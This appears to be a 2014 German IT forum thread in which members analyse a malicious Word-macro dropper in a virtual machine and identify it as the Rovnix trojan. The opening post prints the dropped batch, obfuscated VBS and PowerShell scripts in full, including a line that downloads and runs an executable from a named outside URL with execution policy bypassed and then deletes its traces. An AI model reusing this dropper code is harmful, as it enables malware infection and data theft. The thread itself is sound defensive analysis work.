xaero1982
Nov 07, 2014, updated at Nov 10, 2014 (UTC)
view2678
view15
0
Goto Top

Kann mir das jemand erläutern?

GermansolvedQuestionViruses, TrojansSecurity
Moin,

heute ist ne Mail reingetrudelt - ein "Fax" welches man mit Word öffnen sollte und die Makros aktivieren sollte.

-> VM an -> Office drauf -> Spaß face-smile

Im Ordner C:\Windows\Temp wurden folgende Dateien angelegt:

444.exe -> Details: Gpg4Win V.2.2.2.4 Copyright 2008 g10 Code GmbH 546kb
adobeacd-update.bat

@echo off
ping 1.1.2.2 -n 2
cscript.exe "c:\windows\temp\adobeacd-update.vbs"  
exit

adobeacd-update.vbs
currentDirectory = left(WScript.ScriptFullName,(Len(WScript.ScriptFullName))-(len(WScript.ScriptName)))
caisudkasdknadsklasdjaklajksjklasdkjlajkalkadsjasjklajklah38e = "231"  
Set objFSO=CreateObject("Scripting.FileSystemObject")  
currentFile = "c:\windows\temp\adobeacd-update.ps1"  
caisudkh38e = "231"  
quid8hiqje = "231"  
Set objShell = CreateObject("Wscript.shell")  
caksjhdjaskdhakjshdjkashkjdhaksjdhkjashdjkashdjkashdjkashdjakdahjksd = "231"  
objShell.run "powerShell.exe -noexit -ExecutionPolicy bypass -noprofile -file " & currentFile,0,true  
caisudkhlkasdjkdlskjldsajkldasjkdsajkldasklsadklwqiodiqwjd38e = "231"

adobeacd-update.ps1
$hashroot = '47-ab-cd-f5-8f-bf-f9-1f-94-65-51-7b-96-ea-13-d3';  
$hash = '0';  
$down = New-Object System.Net.WebClient;
$url  = 'http://idtvietnam.vn/images/ork.exe';  
$hashasd = 'asdjäæûôîâäëôûîâäôûkhasjkdhajkshdiusakhdsakhdkjashd';  
$file = 'c:\windows\temp\444.exe';  
$hashasd = 'asdjkhasjkdhajkshdiusakhdsakhdkjashd';  
$down.DownloadFile($url,$file);
$ScriptDir = $MyInvocation.ScriptName;
$someFilePath = 'c:\windows\temp\' + '444.exe';  
$vbsFilePath = 'c:\windows\temp\' + 'adobeacd-update.vbs';  
$batFilePath = 'c:\windows\temp\' + 'adobeacd-update.bat';  
$psFilePath = 'c:\windows\temp\' + 'adobeacd-update.ps1';  
Start-Sleep -s 10;
cmd.exe /c  'c:\windows\temp\444.exe';       
$file1 = gci $vbsFilePath -Force
$file2 = gci $batFilePath -Force
$file3 = gci $psFilePath -Force
$file1.Attributes = $file1.Attributes -bxor [System.IO.FileAttributes]::Hidden
$file2.Attributes = $file2.Attributes -bxor [System.IO.FileAttributes]::Hidden
$file3.Attributes = $file3.Attributes -bxor [System.IO.FileAttributes]::Hidden
If (Test-Path $vbsFilePath){ Remove-Item $vbsFilePath }
If (Test-Path $batFilePath){ Remove-Item $batFilePath }
If (Test-Path $someFilePath){ Remove-Item $someFilePath }
Remove-Item $MyINvocation.InvocationName

Was genau macht das?
comment-contentCommentShareShare
Share on Facebook Share on Twitter Share on Reddit Share on Linkedin

Content-Key: 254187

Url: https://administrator.de/contentid/254187

Printed on: April 16, 2024 at 17:04 o'clock

15 Comments
Latest comment
Goto Top
Member: colinardo
Solution colinardo Nov 07, 2014, updated at Nov 10, 2014 at 17:13:06 (UTC)
Goto Top
Hi Xaero,
die Batch ruft das VBS auf welches wiederum das Powershell-Script aufruft.
Das Powershell-Script macht dann folgendes:

Es lädt eine Datei von einer Webseite herunter 'http://xxxxxxxx/ork.exe' die es unter 'c:\windows\temp\444.exe' auf dem Rechner speichert. Dann führt es die Datei 444.exe in einer Konsole aus (der Virus/Malware/ etc.). Dann versteckt es die 3 Scripte (bat/vbs/ps1) indem es den Dateien das Hidden-Attribut verpasst und löscht zum Schluss sich selber und die anderen Scripte um die Spuren zu verwischen.

Die zwischengeschobenen Hashes etc. sind nur Verwirrspiel, die haben keine Verwendung im Script, und sollen den Otto-Normaluser wohl verwirren oder den eigentlichen Code "verschleiern" face-big-smile. Die haben sich absolut keine Mühe gegeben, das geht wesentlich besser ... das waren dann wohl Script-Kiddie-Anfänger !

Grüße Uwe

p.s. ich hoffe die kleinen Vietnamesen tanzen jetzt nicht noch aus deiner VM hinaus face-smile
Member: Xaero1982
Xaero1982 Nov 07, 2014 at 21:40:59 (UTC)
Goto Top
Also so wirklich klar was die 444.exe macht ist mir nicht... jedenfalls hats die VM zerlegt face-smile

VirtualMachine sagt: Ein schwerwiegender Fehler ist aufgetreten, und die Ausführung der vM wurde unterbrochen.

-> Logs gucken

Kann man rausbekommen was die 444.exe macht?

Danke erst mal face-smile

Grüße
Member: colinardo
colinardo Nov 07, 2014 updated at 21:46:14 (UTC)
Goto Top
Zitat von @Xaero1982:
Kann man rausbekommen was die 444.exe macht?
  • Olydbg anwerfen
  • File durch den Disassembler jagen
  • Gleichzeitig Procmon laufen lassen

Was für lange Winterabende face-wink

Schönes Wochenende
Grüße Uwe
Member: Xaero1982
Xaero1982 Nov 07, 2014 updated at 21:57:44 (UTC)
Goto Top
Procmon mit welchem Filter?

Danke, dir auch face-smile

Grüße

und vor allem was mach ich damit? face-smile also mit dem Ollydbg
Member: colinardo
colinardo Nov 07, 2014 updated at 21:56:39 (UTC)
Goto Top
Zitat von @Xaero1982:
Procmon mit welchem Filter?
Na zuerst mal auf den Prozess 444.exe, später dann auf andere je nachdem was das Teil so macht ...
Member: Xaero1982
Xaero1982 Nov 07, 2014 at 22:16:51 (UTC)
Goto Top
Offenbar macht der ne Menge.

Greift auf allerhand Registrierungseinträge zu, auf alles was aufm Desktop liegt.

Insgesamt 6149 Zugriffe.
Member: colinardo
colinardo Nov 08, 2014 updated at 07:54:02 (UTC)
Goto Top
Zitat von @Xaero1982:

Offenbar macht der ne Menge.

Greift auf allerhand Registrierungseinträge zu, auf alles was aufm Desktop liegt.

Insgesamt 6149 Zugriffe.
wenn du jetzt noch nach Category = "Write" filterst siehst du was er eventuell verändert. Könnte aber auch ein einfacher Datendieb sein der in Dateien und Registry-Einträgen nach Passwörtern scannt und diese an den CC-Server sendet.
Lad das Teil doch einfach mal auf VirusTotal.com hoch, ob es schon in den Definitionen der AntiVirus-Hersteller verzeichnet ist.

Aber wahrscheinlich willst du damit nur etwas üben, gelle face-smile
Member: Xaero1982
Xaero1982 Nov 08, 2014 at 08:42:43 (UTC)
Goto Top
Schau ich mal mit dem Filter... danke face-smile

Naja ich will eigentlich wissen was der Spaß macht... üben... joa auch das face-smile

https://www.virustotal.com/de/file/59b2bc1bdf983b47bad926ef3808f9493c100 ...
Member: Xaero1982
Xaero1982 Nov 08, 2014 at 09:04:04 (UTC)
Goto Top
Das kam bei raus:

"Time of Day","Process Name","PID","Operation","Path","Result","Detail"  
"09:53:33,1463901","ork.exe","2380","RegSetValue","HKLM\SOFTWARE\Wow6432Node\Microsoft\WBEM\CIMOM\Log File Max Size","SUCCESS","Type: REG_SZ, Length: 12, Data: 65536"  
"09:53:33,5291740","ork.exe","2380","CreateFile","C:\Users\Administrator\Desktop\","NAME INVALID","Desired Access: Generic Write, Read Attributes, Disposition: OverwriteIf, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: N, ShareMode: Read, Write, AllocationSize: 0"  
"09:53:38,4024746","ork.exe","2380","CreateFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","SUCCESS","Desired Access: Generic Read, Disposition: Create, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: N, ShareMode: None, AllocationSize: 0, OpenResult: Created"  
"09:53:38,4027583","ork.exe","2380","CreateFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","SUCCESS","Desired Access: Generic Write, Read Attributes, Disposition: OverwriteIf, Options: Synchronous IO Non-Alert, Non-Directory File, Attributes: n/a, ShareMode: Read, Write, AllocationSize: 0, OpenResult: Overwritten"  
"09:53:38,4028118","ork.exe","2380","WriteFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","SUCCESS","Offset: 0, Length: 9, Priority: Normal"  
"09:53:38,4029443","ork.exe","2380","WriteFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","FAST IO DISALLOWED","Offset: 9, Length: 8"  
"09:53:38,4029526","ork.exe","2380","WriteFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","SUCCESS","Offset: 9, Length: 8, Priority: Normal"  
"09:53:38,4029708","ork.exe","2380","WriteFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","FAST IO DISALLOWED","Offset: 17, Length: 9"  
"09:53:38,4029772","ork.exe","2380","WriteFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","SUCCESS","Offset: 17, Length: 9, Priority: Normal"  
"09:53:38,4029884","ork.exe","2380","WriteFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","FAST IO DISALLOWED","Offset: 26, Length: 1"  
"09:53:38,4029945","ork.exe","2380","WriteFile","C:\Users\Administrator\AppData\Local\Temp\1\tmp74A4.tmp","SUCCESS","Offset: 26, Length: 1, Priority: Normal"  
"09:53:38,5466385","ork.exe","2380","RegSetValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable","SUCCESS","Type: REG_DWORD, Length: 4, Data: 0"  
"09:53:38,5466503","ork.exe","2380","RegDeleteValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer","NAME NOT FOUND",""  
"09:53:38,5466579","ork.exe","2380","RegDeleteValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride","NAME NOT FOUND",""  
"09:53:38,5466637","ork.exe","2380","RegDeleteValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL","NAME NOT FOUND",""  
"09:53:38,5466692","ork.exe","2380","RegDeleteValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoDetect","NAME NOT FOUND",""  
"09:53:38,5468236","ork.exe","2380","RegSetValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings","SUCCESS","Type: REG_BINARY, Length: 56, Data: 46 00 00 00 05 00 00 00 09 00 00 00 00 00 00 00"  
"09:54:03,4389855","ork.exe","2380","RegSetValue","HKCU\Software\Microsoft\Installer\Products\B808096432\LP","SUCCESS","Type: REG_SZ, Length: 100, Data: C:\Users\ADMINI~1\AppData\Local\Temp\1\L808096432"
Member: colinardo
colinardo Nov 08, 2014 updated at 11:42:58 (UTC)
Goto Top
dann schau mal was das Teil in die Temp-Datei tmp74A4.tmp schreibt, ich vermute es dupliziert sich als Backup.
Dann modifiziert es noch die Proxy-Einstellungen, um dann wahrscheinlich den Traffic über eine lokal gestarteten Proxy zu leiten der wiederum den Internet-Traffic zu den Tätern umleitet, wo diese dann Passwörter abfischen.

Aber wie gesagt, eine tiefgreifende Analyse bedeutet auf allen Schienen zu Monitoren, auch mit Wiresharkt den Netzwerktraffic zu beobachten.

Deshalb ist eine vollständige Analyse für uns hier sehr schwer.
Member: Xaero1982
Xaero1982 Nov 08, 2014 at 17:00:08 (UTC)
Goto Top
Also damit kann sich wohl niemand nen Ei machen:

LP=C:\Users\ADMINI~1\AppData\Local\Temp\L808096432
[2]
D=0
OS=Windows Server 2012  / 64 bit
FS=NTFS
VID=808096432
M=1
[1]
ID=101
D=08.11.2014
T=17:49:29
CPID=3776
CFN=C:\Users\Administrator\Desktop\ork.exe
PPID=3096
PFN=cmd.exe
CDR=C:\Users\Administrator\Desktop
CUSR=HOME\administrator
EUSR=HOME\administrator
LVL=HIGH

Nach Hause telefoniert da irgendwie nix...

Link zum runterladen der exe is oben xD
Member: colinardo
colinardo Nov 08, 2014, updated at Nov 10, 2014 at 16:00:09 (UTC)
Goto Top
Das ist ein Trojaner der sensitive Informationen über sein Opfer stiehlt:
http://kb.eset.com/esetkb/index?page=content&id=SOLN3471

Win32/Rovnix is a trojan that steals sensitive information. The trojan attempts to send gathered information to a remote machine. It uses techniques common among rootkits.
Die Übermittlung muss nicht immer direkt stattfinden, das lässt sich meistens erst sagen wenn man den über einen längeren Zeitraum beobachtet. Es kann auch sein das der Server schon vom
Netz genommen wurde. Ausserdem könnte er es ja über einen lokal installierten Proxy verschleiern . Das scheinen Grundlegende Infos über das System zu sein die dann irgendwann an den CC-Server geschickt werden.
Member: Xaero1982
Xaero1982 Nov 08, 2014 at 20:19:37 (UTC)
Goto Top
Danke für den Link:

Win32/Rovnix not found
Member: C.R.S.
C.R.S. Nov 10, 2014 at 15:54:46 (UTC)
Goto Top
Zitat von @Xaero1982:

Nach Hause telefoniert da irgendwie nix...

DNS-Request übersehen! optimalnewbie.co.uk ist aber schon länger trocken gelegt.
Member: Xaero1982
Xaero1982 Nov 10, 2014 at 17:12:30 (UTC)
Goto Top
Könntest du recht haben, dass mir da sowas über den Weg gelaufen ist...
GermansolvedQuestionViruses, TrojansSecurity
Hotly discussed
DaniEnd of Support dates for Office 2016, 2019 Apps und Productivity ServersDani - 1 Comment